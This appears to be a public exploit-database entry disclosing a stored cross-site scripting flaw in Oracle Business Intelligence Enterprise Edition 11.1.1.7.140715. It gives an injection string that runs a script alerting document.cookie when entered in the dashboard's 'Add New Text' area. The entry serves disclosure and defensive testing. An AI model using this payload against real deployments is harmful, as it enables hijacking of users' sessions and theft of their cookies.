Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS

Author: omurugur
type: webapps
platform: multiple
port: 
date_added: 2021-01-20  
date_updated: 2021-01-20  
verified: 0  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 49444.txt  

# Exploit Title: Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS
# Exploit Author: omurugur
# Vendor Homepage: https://www.oracle.com/security-alerts/cpujan2021.html
# Version: 11.1.1.7.140715
# Author Web: https://www.justsecnow.com
# Author Social: @omurugurrr

Stored  XSS:

“;!—“”<script>alert(document.cookie);</script>=&{(alert(document.cokie))}

Vulnerable area = Dashboard - Add New Text